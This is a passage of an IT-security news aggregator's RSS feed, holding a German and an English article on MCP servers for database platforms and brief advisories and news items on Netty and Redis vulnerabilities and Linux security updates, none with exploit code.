<p><strong>Zu empfehlen für:</strong> Alle, die MongoDB nutzen und ihre KI-fähige IDE oder CLI mit mehr Automatisierungsfunktionen ausstatten möchten.</p>



<h2 class="wp-block-heading">Pinecone MCP-Server</h2>



<p>Geht es um native <a href="https://www.computerwoche.de/article/2829270/warum-vektorisierung-die-basis-fuer-genai-ist.html" target="_blank">Vektordatenbanken</a>, ist Pinecone eine performante und weit verbreitete Option – inklusive einer gut durchdachten <a href="https://docs.pinecone.io/reference/api/introduction" target="_blank" rel="noreferrer noopener">API</a> und umfassenden SDKs. Der <a href="https://docs.pinecone.io/guides/operations/mcp-server" target="_blank" rel="noreferrer noopener">Pinecone MCP-Server</a> erweitert diese Möglichkeiten und befähigt Benutzer etwa dazu, die Dokumentation abzufragen und Funktionen über KI-Agenten und KI-fähige IDEs auszuführen. Dabei zeichnet sich der Pinecone MCP-Server durch einfache Konfiguration und Installation aus. Derzeit besteht der Pinecone MCP-Server aus neun MCP-Tools. Diese decken diverse schreibgeschützte Aktionen ab, etwa:</p>



<ul class="wp-block-list">
<li>Knowledge Gathering über die offizielle Pinecone-Dokumentation,</li>



<li>die Abfrage von Vektordatensätzen, Index-Metadaten, Konfigurationen sowie Statistiken, und</li>



<li>Datensätze und Indizes zu aktualisieren, beziehungsweise neu zu erstellen.</li>
</ul>



<p><strong>Zu empfehlen für:</strong> Pinecone-Nutzer, die neue LLM-gestützte Workflows ausprobieren möchten, um Indizes mit Embeddings zu erstellen oder Ergebnisse mithilfe von natürlichsprachlichen Befehlen  überprüfen möchten.</p>



<h2 class="wp-block-heading">Redis MCP-Server</h2>



<p>Als schnelle In-Memory-Datenbank wird Redis vornehmlich für Caching, Echtzeitanalysen und andere Anwendungsfälle eingesetzt, bei denen es auf die Latenz ankommt. Die Macher von Redis stellen ebenfalls einen <a href="https://redis.io/docs/latest/integrate/redis-mcp/" target="_blank" rel="noreferrer noopener">offiziellen MCP-Server</a> zur Verfügung, der Lese-, Abfrage- und Schreibfunktionen realisiert. Entwickler können den Redis MCP-Server über einen LLM-Client nutzen, um Redis-Daten auf Prompt-Basis:</p>



<ul class="wp-block-list">
<li>abzufragen,</li>



<li>zu analysieren oder</li>



<li>einzubetten.</li>
</ul>



<p>Die <a href="https://redis.io/docs/latest/integrate/redis-mcp/">Dokumentation</a> enthält auch einige Beispiel-Prompts für gängige Anwendungsfälle.</p>



<p>Im Gegensatz zu anderen MCP-Servern, die nur einen Teil der Plattformfunktionen abbilden, bietet Redis MCP vollen Support. Laut dem zugehörigen <a href="https://github.com/redis/mcp-redis" target="_blank" rel="noreferrer noopener">GitHub-Repository</a> stellt es so auch kein Problem dar, mit Redis-Konstrukten wie Hashes, Lists, Sets und Streams zu arbeiten. Ein möglicher Nachteil dieser Option: Der Redis MCP-Server bietet bislang keinen Support für Streamable-HTTP-Transport. Bis es soweit ist, ist dieser MCP-Server auf eine lokale Bereitstellung beschränkt.</p>



<p><strong>Zu empfehlen für:</strong> Alle, die einen lokalen MCP-Server für die Arbeit mit Redis-Daten suchen.</p>



<h2 class="wp-block-heading">Snowflake MCP-Server</h2>



<p>Snowflake ist eine in der Cloud gehostete, KI-fähige Datenplattform, die im Enterprise-Umfeld häufig für Data Warehousing, Datenanalysen und Data Engineering eingesetzt wird. Im Vergleich zu anderen Plattformen zeichnet sich Snowflake dabei dadurch aus, dass es vollumfänglich gemanagt wird und strukturierte sowie unstrukturierte Datentypen kombiniert. Der <a href="https://www.snowflake.com/en/developers/guides/getting-started-with-snowflake-mcp-server/" target="_blank" rel="noreferrer noopener">Snowflake MCP Server</a>, der über <a href="https://github.com/Snowflake-Labs/mcp" target="_blank" rel="noreferrer noopener">GitHub</a> verfügbar ist, lässt sich für diverse Standardoperationen der Snowflake-Plattform einsetzen. Dazu gehören etwa:</p>



<ul class="wp-block-list">
<li>„Fuzzy“-Suchen über Snowflakes Cortex Search in allen Datensätzen, sowie</li>



<li>semantische Abfragen strukturierter Daten mithilfe von Cortex Analyst.</li>
</ul>



<p>Zu den weiteren Funktionen gehören Objektmanagement-Prozesse – also Datensätze zu erstellen, zu aktualisieren oder zu löschen. Der MCP-Server kann darüber hinaus weitere agentenbasierte Funktionen realisieren, etwa SQL-Anweisungen für Backend-Datenbanken zu generieren und auszuführen. Der Snowflake MCP-Server ist dabei sowohl gut durchdacht als auch umfassend dokumentiert.</p>



<p><strong>Zu empfehlen für:</strong> Anwender, die bereits mit Snowflake arbeiten.</p>



<h2 class="wp-block-heading">Supabase MCP-Server</h2>



<p>PostgreSQL ist eines der beliebtesten und bewährtesten objektrelationalen, SQL-basierten Datenbanksysteme. Seiner aktiven <a href="https://leaddev.com/technical-direction/postgresql-database-quietly-ate-world" target="_blank" rel="noreferrer noopener">Open-Source-Community</a> sei Dank wurde PostgreSQL über Jahrzehnte hinweg weiterentwickelt. Aufgrund des quelloffenen Charakters gibt es jedoch keinen „offiziellen“ MCP-Server für die Plattform. Anthropic hatte ursprünglich zwar eine Referenzimplementierung entwickelt, diese ist jedoch <a href="https://github.com/modelcontextprotocol/servers-archived/tree/main/src/postgres" target="_blank" rel="noreferrer noopener">mittlerweile archiviert</a>.</p>



<p>Stattdessen bieten auf PostgreSQL aufbauende Datenbankplattformen <a href="https://dbhub.ai/blog/state-of-postgres-mcp-servers-2025" target="_blank" rel="noreferrer noopener">verschiedene Varianten</a> von MCP-Servern an. Diese unterscheiden sich hinsichtlich ihrer Herstellerneutralität und Spezifität. Eine bemerkenswerte Option ist der <a href="https://github.com/supabase-community/supabase-mcp#database" target="_blank" rel="noreferrer noopener">MCP-Server von Supabase</a>, einer Cloud-basierten „Backend-as-a-Service“- und Postgres-Entwicklungsplattform. Der Supabase MCP Server verbindet KI-Agenten mit Supabase-Projekten und ermöglicht es Entwicklern, Befehle in natürlicher Sprache zu erteilen, um:</p>



<ul class="wp-block-list">
<li>Tabellen zu verwalten,</li>



<li>Daten abzufragen,</li>



<li>Protokolle abzurufen, und</li>



<li>Konfigurationsinformationen einzusehen.</li>
</ul>



<p>Allerdings gibt es noch kein finales Release des MCP-Servers von Supabase, weswegen einige Funktionen noch experimentell sind.</p>



<p><strong>Zu empfehlen für:</strong> Entwickler, die Supabase nutzen und nach einem MCP-Server suchen, um KI-Assistenten mit Postgres-Datenbanken zu verbinden – auf experimenteller Basis.</p>



<h2 class="wp-block-heading">Weitere MCP-Serveroptionen für Datenbanken</h2>



<p>Neben den offiziellen MCP-Servern mit Anbieter-Support stehen auch zahlreiche MCP-Server für weitere Datenbankplattformen und -typen zur Verfügung. Zum Beispiel:</p>



<ul class="wp-block-list">
<li><a href="https://github.com/bytebase/dbhub" target="_blank" rel="noreferrer noopener">DBHub</a>, ein MCP-Server, der den LLM-Zugriff über verschiedene Datenbanktypen hinweg bündelt und mit MySQL, PostgreSQL, SQL Server, MariaDB und SQLite kompatibel ist.</li>



<li>Der <a href="https://github.com/benborla/mcp-server-mysql">MCP Server for MySQL</a>, der vom deutschen Full-Stack-Entwickler <a href="https://benborla.dev/">Ben Borla</a> entwickelt und für Claude Code optimiert wurde.</li>



<li>Die Supabase-, respektive Postgres-Alternativen <a href="https://github.com/pgEdge/pgedge-postgres-mcp/" target="_blank" rel="noreferrer noopener">pgEdge Postgres MCP</a>, <a href="https://neon.com/docs/ai/neon-mcp-server" target="_blank" rel="noreferrer noopener">Neon MCP Server</a> und <a href="https://github.com/crystaldba/postgres-mcp" target="_blank" rel="noreferrer noopener">Postgres MCP Pro</a>.</li>



<li>Die auf Vektordatenbanken ausgelegten MCP-Server von <a href="https://docs.weaviate.io/weaviate/mcp/docs-mcp-server" target="_blank" rel="noreferrer noopener">Weaviate</a> und <a href="https://milvus.io/docs/milvus_and_mcp.md" target="_blank" rel="noreferrer noopener">Milvus</a>.</li>
</ul>



<p>(fm)</p>



<p><strong>Dieser Artikel ist </strong><a href="https://www.infoworld.com/article/4181843/10-mcp-servers-to-connect-llms-with-databases.html" target="_blank"><strong>im Original</strong></a><strong> bei unserer Schwesterpublikation Infoworld.com erschienen.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-44250 | Netty prior 4.1.135.Final/4.2.15.Final Redis resource consumption (GHSA-3244-j874-rhc2 / WID-SEC-2026-1814)]]></title>
<description><![CDATA[A vulnerability labeled as problematic has been found in Netty. Affected is an unknown function of the component Redis Handler. Executing a manipulation can lead to resource consumption.

The identification of this vulnerability is CVE-2026-44250. The attack may be launched remotely. There is no ...]]></description>
<link>https://tsecurity.de/de/3594508/sicherheitsluecken/cve-2026-44250-netty-prior-41135final4215final-redis-resource-consumption-ghsa-3244-j874-rhc2-wid-sec-2026-1814/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3594508/sicherheitsluecken/cve-2026-44250-netty-prior-41135final4215final-redis-resource-consumption-ghsa-3244-j874-rhc2-wid-sec-2026-1814/</guid>
<pubDate>Fri, 12 Jun 2026 22:35:01 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/netty">Netty</a>. Affected is an unknown function of the component <em>Redis Handler</em>. Executing a manipulation can lead to resource consumption.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2026-44250">CVE-2026-44250</a>. The attack may be launched remotely. There is no exploit available.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (.NET 10.0, .NET 8.0, .NET 9.0, bind, expat, httpd:2.4, kernel, kernel-rt, mod_http2, openssl, poppler, redis, redis:7, samba, and unbound), Debian (ironic, kernel-wedge, libinput, linux-base, and neutron), Fedora (kernel, openssl, vaultwarden, and v...]]></description>
<link>https://tsecurity.de/de/3593601/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3593601/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 12 Jun 2026 15:22:47 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (.NET 10.0, .NET 8.0, .NET 9.0, bind, expat, httpd:2.4, kernel, kernel-rt, mod_http2, openssl, poppler, redis, redis:7, samba, and unbound), <b>Debian</b> (ironic, kernel-wedge, libinput, linux-base, and neutron), <b>Fedora</b> (kernel, openssl, vaultwarden, and vaultwarden-web), <b>Mageia</b> (erlang-hex_core, erlang-rebar3, gnupg2, and sqlite3), <b>Red Hat</b> (buildah, podman, and skopeo), <b>SUSE</b> (flannel, gdk-pixbuf-loader-libheif, gnutls, google-cloud-sap-agent, grafana, graphite2, hplip, libIex-3_4-33, libzypp, nginx, openssh, perl-DBI, perl-Git-Repository, perl-Protocol-HTTP2, python-Pygments, python-simpleeval, python311-Django4, rclone, roundcubemail, strongswan, tomcat10, tomcat11, unbound, and webkit2gtk3), and <b>Ubuntu</b> (apache2, dotnet8, dotnet9, dotnet10, gst-plugins-base1.0, ironic, linux-azure-5.15, linux-azure-fips, lwip, mistral, and ubuntu-kylin-software-center).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in redis (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3592487/unix-server/security-mehrere-probleme-in-redis-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3592487/unix-server/security-mehrere-probleme-in-redis-red-hat/</guid>
<pubDate>Fri, 12 Jun 2026 07:31:15 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (.NET 10.0, .NET 8.0, .NET 9.0, podman, poppler, and postgresql-jdbc), Debian (chromium, jackson-core, libdbi-perl, and libinput), Fedora (httpd, rust, and xmlstarlet), Mageia (openssh, postfix, and roundcubemail), Oracle (frr, kernel, libyang, n, po...]]></description>
<link>https://tsecurity.de/de/3590726/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590726/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 11 Jun 2026 15:26:36 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (.NET 10.0, .NET 8.0, .NET 9.0, podman, poppler, and postgresql-jdbc), <b>Debian</b> (chromium, jackson-core, libdbi-perl, and libinput), <b>Fedora</b> (httpd, rust, and xmlstarlet), <b>Mageia</b> (openssh, postfix, and roundcubemail), <b>Oracle</b> (frr, kernel, libyang, n, postgresql-jdbc, and unbound), <b>Red Hat</b> (.NET 10.0, .NET 8.0, .NET 9.0, redis, and redis:7), <b>SUSE</b> (agama-web-ui, cockpit, cosign, glibc, google-cloud-sap-agent, google-osconfig-agent, kanidm, kernel, kubernetes, kubernetes1.23, kubernetes1.24, kubernetes1.25, kubernetes1.27, kubernetes1.28, libpodofo-devel, libyang, NetworkManager-libreswan, openCryptoki, python311-pypdf, rclone, steampipe, wicked, and xen), and <b>Ubuntu</b> (exim4, libcrypt-saltedhash-perl, libhttp-daemon-perl, samba, and uriparser).]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8401-1: Netty vulnerabilities]]></title>
<description><![CDATA[It was discovered that Netty's HTTP proxy handler did not properly
validate headers when constructing CONNECT requests. An
attacker could possibly use this issue to inject arbitrary HTTP
headers into CONNECT requests. This issue only affected Ubuntu
18.04 LTS, Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, ...]]></description>
<link>https://tsecurity.de/de/3582443/unix-server/usn-8401-1-netty-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3582443/unix-server/usn-8401-1-netty-vulnerabilities/</guid>
<pubDate>Mon, 08 Jun 2026 20:15:54 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that Netty's HTTP proxy handler did not properly
validate headers when constructing CONNECT requests. An
attacker could possibly use this issue to inject arbitrary HTTP
headers into CONNECT requests. This issue only affected Ubuntu
18.04 LTS, Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, Ubuntu 24.04 LTS,
and Ubuntu 26.04 LTS. (CVE-2026-42578)

It was discovered that Netty's DNS codec did not properly enforce
domain name constraints. An attacker could possibly use this issue to
bypass domain name validation, or cause Netty to consume resources,
leading to a denial of service. This issue only affected Ubuntu 20.04
LTS, Ubuntu 22.04 LTS, Ubuntu 24.04 LTS, and Ubuntu 26.04 LTS.
(CVE-2026-42579)

It was discovered that Netty did not correctly handle HTTP/1.0
requests containing both a Transfer-Encoding and Content-Length
header. A remote attacker could possibly use this issue to perform
HTTP request smuggling attacks. (CVE-2026-42581)

Violeta Georgieva discovered that Netty incorrectly paired responses with
requests when handling informational HTTP responses. A remote attacker
could possibly use this issue to perform HTTP request smuggling attacks.
(CVE-2026-42584)

Violeta Georgieva discovered that Netty incorrectly parsed malformed
Transfer-Encoding headers. A remote attacker could possibly use this
issue to perform HTTP request smuggling attacks. (CVE-2026-42585)

It was discovered that Netty's Redis encoder did not validate CRLF
characters. An attacker could possibly use this issue to inject arbitrary
Redis commands. This issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04
LTS, Ubuntu 22.04 LTS, Ubuntu 24.04 LTS, and Ubuntu 26.04 LTS.
(CVE-2026-42586)]]></content:encoded>
</item>
<item>
<title><![CDATA[The AI Agents Stack (2026 Edition)]]></title>
<description><![CDATA[The following article originally appeared on Paolo Perrone’s The AI Engineer Substack and is being reposted here with the author’s permission. Your team picks LangGraph for a customer support chatbot. Three weeks in, you’ve got 14 nodes in a state graph, a custom checkpointer writing to Redis, an...]]></description>
<link>https://tsecurity.de/de/3581437/ai-nachrichten/the-ai-agents-stack-2026-edition/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581437/ai-nachrichten/the-ai-agents-stack-2026-edition/</guid>
<pubDate>Mon, 08 Jun 2026 14:32:26 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The following article originally appeared on Paolo Perrone’s The AI Engineer Substack and is being reposted here with the author’s permission. Your team picks LangGraph for a customer support chatbot. Three weeks in, you’ve got 14 nodes in a state graph, a custom checkpointer writing to Redis, and retry logic for tool calls that fail […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Redis Bug Allows Remote Attackers to Gain Server Control]]></title>
<description><![CDATA[A recently disclosed critical Redis bug allows remote attackers to take over the server via a severe Use-After-Free vulnerability in the replication subsystem. Tracked as CVE-2026-23631 and dubbed DarkReplica, this post-authentication flaw was uncovered during the ZeroDay.Cloud 2025 competition i...]]></description>
<link>https://tsecurity.de/de/3581118/it-security-nachrichten/critical-redis-bug-allows-remote-attackers-to-gain-server-control/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581118/it-security-nachrichten/critical-redis-bug-allows-remote-attackers-to-gain-server-control/</guid>
<pubDate>Mon, 08 Jun 2026 12:38:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A recently disclosed critical Redis bug allows remote attackers to take over the server via a severe Use-After-Free vulnerability in the replication subsystem. Tracked as CVE-2026-23631 and dubbed DarkReplica, this post-authentication flaw was uncovered during the ZeroDay.Cloud 2025 competition in London. The researcher earned a $30,000 bounty for demonstrating how the exploit exploits a synchronization […]</p>
<p>The post <a href="https://cyberpress.org/critical-redis-server-takeover/">Critical Redis Bug Allows Remote Attackers to Gain Server Control</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Redis RCE Vulnerability Enable Attackers to Gain Complete Control to Host Server]]></title>
<description><![CDATA[In May 2026, Redis developers fixed a dangerous post-authentication remote code execution vulnerability, dubbed DarkReplica (CVE-2026-23631), that allowed attackers to gain full control of a Redis host. Redis provides powerful server-side Lua engines, allowing administrators to run custom logic d...]]></description>
<link>https://tsecurity.de/de/3581041/it-security-nachrichten/critical-redis-rce-vulnerability-enable-attackers-to-gain-complete-control-to-host-server/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581041/it-security-nachrichten/critical-redis-rce-vulnerability-enable-attackers-to-gain-complete-control-to-host-server/</guid>
<pubDate>Mon, 08 Jun 2026 12:05:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In May 2026, Redis developers fixed a dangerous post-authentication remote code execution vulnerability, dubbed DarkReplica (CVE-2026-23631), that allowed attackers to gain full control of a Redis host. Redis provides powerful server-side Lua engines, allowing administrators to run custom logic directly…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/critical-redis-rce-vulnerability-enable-attackers-to-gain-complete-control-to-host-server/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/critical-redis-rce-vulnerability-enable-attackers-to-gain-complete-control-to-host-server/">Critical Redis RCE Vulnerability Enable Attackers to Gain Complete Control to Host Server</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Hourly Summary 2026-06-08 12h : 6 posts]]></title>
<description><![CDATA[6 posts were published in the last hour 10:4 : Lucid Stealer Hits 18 Browsers, Crypto Wallets, and Discord Tokens 10:4 : Critical Redis RCE Vulnerability Enable Attackers to Gain Complete Control to Host Server 10:4 : UniFi OS Server…
Read more →
The post IT Security News Hourly Summary 2026-06-0...]]></description>
<link>https://tsecurity.de/de/3581039/it-security-nachrichten/it-security-news-hourly-summary-2026-06-08-12h-6-posts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581039/it-security-nachrichten/it-security-news-hourly-summary-2026-06-08-12h-6-posts/</guid>
<pubDate>Mon, 08 Jun 2026 12:05:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>6 posts were published in the last hour 10:4 : Lucid Stealer Hits 18 Browsers, Crypto Wallets, and Discord Tokens 10:4 : Critical Redis RCE Vulnerability Enable Attackers to Gain Complete Control to Host Server 10:4 : UniFi OS Server…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-06-08-12h-6-posts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-06-08-12h-6-posts/">IT Security News Hourly Summary 2026-06-08 12h : 6 posts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Redis RCE Vulnerability Enable Attackers to Gain Complete Control to Host Server]]></title>
<description><![CDATA[In May 2026, Redis developers fixed a dangerous post-authentication remote code execution vulnerability, dubbed DarkReplica (CVE-2026-23631), that allowed attackers to gain full control of a Redis host. Redis provides powerful server-side Lua engines, allowing administrators to run custom logic d...]]></description>
<link>https://tsecurity.de/de/3580908/it-security-nachrichten/critical-redis-rce-vulnerability-enable-attackers-to-gain-complete-control-to-host-server/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580908/it-security-nachrichten/critical-redis-rce-vulnerability-enable-attackers-to-gain-complete-control-to-host-server/</guid>
<pubDate>Mon, 08 Jun 2026 11:09:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In May 2026, Redis developers fixed a dangerous post-authentication remote code execution vulnerability, dubbed DarkReplica (CVE-2026-23631), that allowed attackers to gain full control of a Redis host. Redis provides powerful server-side Lua engines, allowing administrators to run custom logic directly in the database. There are two such engines: the older scripting engine and the newer […]</p>
<p>The post <a href="https://cybersecuritynews.com/redis-rce-vulnerability-server/">Critical Redis RCE Vulnerability Enable Attackers to Gain Complete Control to Host Server</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[10 MCP servers to connect LLMs with databases]]></title>
<description><![CDATA[Model Context Protocol (MCP) has gained considerable momentum as a standard connector between LLM-powered tools and local systems, internal and external APIs, and data sources. From major clouds to devops tools, MCP servers are enabling powerful, AI-powered development and operations capabilities...]]></description>
<link>https://tsecurity.de/de/3580893/ai-nachrichten/10-mcp-servers-to-connect-llms-with-databases/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580893/ai-nachrichten/10-mcp-servers-to-connect-llms-with-databases/</guid>
<pubDate>Mon, 08 Jun 2026 11:03:51 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">Model Context Protocol</a> (MCP) has gained considerable momentum as a standard connector between LLM-powered tools and local systems, internal and external APIs, and data sources. From <a href="https://www.infoworld.com/article/4129024/five-mcp-servers-to-rule-the-cloud.html">major clouds</a> to <a href="https://www.infoworld.com/article/4096223/10-mcp-servers-for-devops.html">devops tools</a>, MCP servers are enabling powerful, AI-powered development and operations capabilities through natural language commands.</p>



<p>Nowhere is this more true than in the world of databases. Most major database platforms now support agentic access through MCP servers. Using an MCP server for databases, you and your AI agent proxies can perform lookups, create and update data, and perform administrative tasks without you having to write SQL by hand.</p>



<p>The MCP server could also guide your LLMs to write new code or build automations that align with your database schema, like its tables, structure, and fields, as well as embeddings, indexes, and metadata. It could also aid debugging by enabling faster queries to surface data issues or misconfigurations, along with plenty of other possible use cases.</p>



<p>Below, we’ll cover official MCP servers from some of the top platform options across major database styles. Though maturity varies, the MCP servers discussed below represent some of the best vendor-backed offerings available today across relational <a href="https://www.infoworld.com/article/4140734/the-revenge-of-sql-how-a-50-year-old-language-reinvents-itself.html" data-type="link" data-id="https://www.infoworld.com/article/4140734/the-revenge-of-sql-how-a-50-year-old-language-reinvents-itself.html">SQL</a>, <a href="https://www.infoworld.com/article/2260280/what-is-nosql-databases-for-a-cloud-scale-future.html" data-type="link" data-id="https://www.infoworld.com/article/2260280/what-is-nosql-databases-for-a-cloud-scale-future.html">NoSQL</a>, <a href="https://www.infoworld.com/article/2265778/what-is-a-graph-database-a-better-way-to-store-connected-data.html" data-type="link" data-id="https://www.infoworld.com/article/2265778/what-is-a-graph-database-a-better-way-to-store-connected-data.html">graph</a>, <a href="https://www.infoworld.com/article/2335281/vector-databases-in-llms-and-search.html" data-type="link" data-id="https://www.infoworld.com/article/2335281/vector-databases-in-llms-and-search.html">vector</a>, and <a href="https://www.infoworld.com/article/2268778/what-is-a-data-warehouse-the-source-of-business-intelligence.html" data-type="link" data-id="https://www.infoworld.com/article/2268778/what-is-a-data-warehouse-the-source-of-business-intelligence.html">data warehouse</a> systems.</p>



<p>These servers can be used by any MCP-compatible tool, IDE, or agent, whether it’s Claude Code, Codex, Cursor, Gemini CLI, Google Antigravity, VS Code, Windsurf, or something else. Adding them is typically simple, often involving a lightweight JSON addition to your MCP configuration file.</p>



<h2 class="wp-block-heading"><a></a><a></a>Amazon Aurora MCP Servers</h2>



<p><a href="https://www.mysql.com/">MySQL</a> and <a href="https://www.postgresql.org/">PostgreSQL</a> are the world’s most widely-used <a href="https://www.infoworld.com/article/2262355/what-is-open-source-software-open-source-and-foss-explained.html">open source</a> databases. However, in both cases, there is no canonical MCP server—what we see are different MCP servers emerging across vendors. One of these vendors is Amazon Web Services (AWS), which offers official MCP servers for Amazon Aurora, its managed relational database service compatible with both MySQL and PostgreSQL.</p>



<p>According to the <a href="https://github.com/awslabs/mcp/tree/main/src/mysql-mcp-server">documentation on GitHub</a>, the <a href="https://awslabs.github.io/mcp/servers/mysql-mcp-server">Amazon Aurora MySQL MCP Server</a> can be used to convert natural language commands into MySQL-compatible SQL queries, which can then be executed against Aurora MySQL databases. Similarly, the <a href="https://github.com/awslabs/mcp/tree/main/src/postgres-mcp-server">Aurora Postgres MCP Server</a> provides MCP tools for working on PostgreSQL databases. The <a href="https://github.com/awslabs/mcp/tree/main/src/aurora-dsql-mcp-server">Aurora DSQL MCP Server</a> does the same for distributed Postgres databases.</p>



<p>AWS provides a <a href="https://github.com/awslabs/mcp">growing portfolio of official MCP servers</a> across its product line, including MCP servers for other Amazon database platforms like <a href="https://awslabs.github.io/mcp/servers/dynamodb-mcp-server">DynamoDB</a>, <a href="https://awslabs.github.io/mcp/servers/elasticache-mcp-server">ElastiCache</a>, and <a href="https://awslabs.github.io/mcp/servers/redshift-mcp-server">Redshift</a>. If you’re a heavy AWS shop and you want to enable LLM interactions with your data, these are sensible choices.</p>



<h1 class="wp-block-heading"><a></a>BigQuery MCP Server</h1>



<p>BigQuery is Google’s cloud-based data analytics platform, and a popular data source for AI applications. BigQuery users with API access configured can also utilize the <a href="https://docs.cloud.google.com/bigquery/docs/use-bigquery-mcp">BigQuery MCP Server</a> to interact with the platform using MCP-compatible AI clients.</p>



<p>Using the remote <a href="https://docs.cloud.google.com/bigquery/docs/use-bigquery-mcp">BigQuery MCP Server</a>, engineers can generate and execute queries on data sources, or return metadata on datasets, tables, and schema. This can be done with a simple natural language prompt like “List the datasets in project <code>PROJECT_ID</code>.” Results are filterable by region, data set ID, column name, and more.</p>



<p>As part of Google’s fully-managed, remote-hosted MCP portfolio, the BigQuery MCP Server provides some peace of mind regarding security, maintenance, and ease of use for distributed teams. The MCP tools are subject to some limitations, however, in terms of query result size, processing time, and other factors. If you’re using BigQuery and you want more agentic control, you’ll want to check this one out.</p>



<h2 class="wp-block-heading"><a></a>Elastic Agent Builder</h2>



<p>Another important database category includes platforms designed for keyword and semantic search. In this space, <a href="https://www.elastic.co/elasticsearch">Elasticsearch</a> is commonly deployed. Instead of providing a single MCP server, Elasticsearch provides the <a href="https://www.elastic.co/docs/explore-analyze/ai-features/elastic-agent-builder">Elastic Agent Builder</a>, which is a more comprehensive framework aimed at agentic workflows.</p>



<p>Using Elastic Agent Builder, you can chat with an agent to retrieve data context from Elasticsearch data and extend it into various environments. The Agent Builder itself includes an <a href="https://www.elastic.co/docs/explore-analyze/ai-features/agent-builder/mcp-server">MCP server</a> endpoint for programmability and exposing the agent to other clients.</p>



<p>Unlike others on this list, this is not a direct MCP interface to raw Elasticsearch APIs. Instead, it’s an interface that exposes skills from the agent platform. This should also not be confused with the <a href="https://github.com/elastic/mcp-server-elasticsearch/releases">Elasticsearch MCP Server</a>, released in mid-2025, which has since been deprecated.</p>



<p>A possible downside of using this utility is that it includes an additional layer between your IDE or agent and the data you’re searching. The agent setup requires a higher subscription and takes additional steps to configure compared to other MCP servers.</p>



<p>That said, if you want an extensible common layer to interact with both Elasticsearch and external MCP servers, while centralizing responsibilities like permissions, this is an interesting proposition.</p>



<h2 class="wp-block-heading"><a></a>MCP servers for Neo4j</h2>



<p>Graph databases are another key NoSQL database type these days, specializing in using nodes and edges to accelerate queries of highly interconnected data. Of these, <a href="https://neo4j.com/product/neo4j-graph-database/">Neo4j</a> is a popular graph database option.</p>



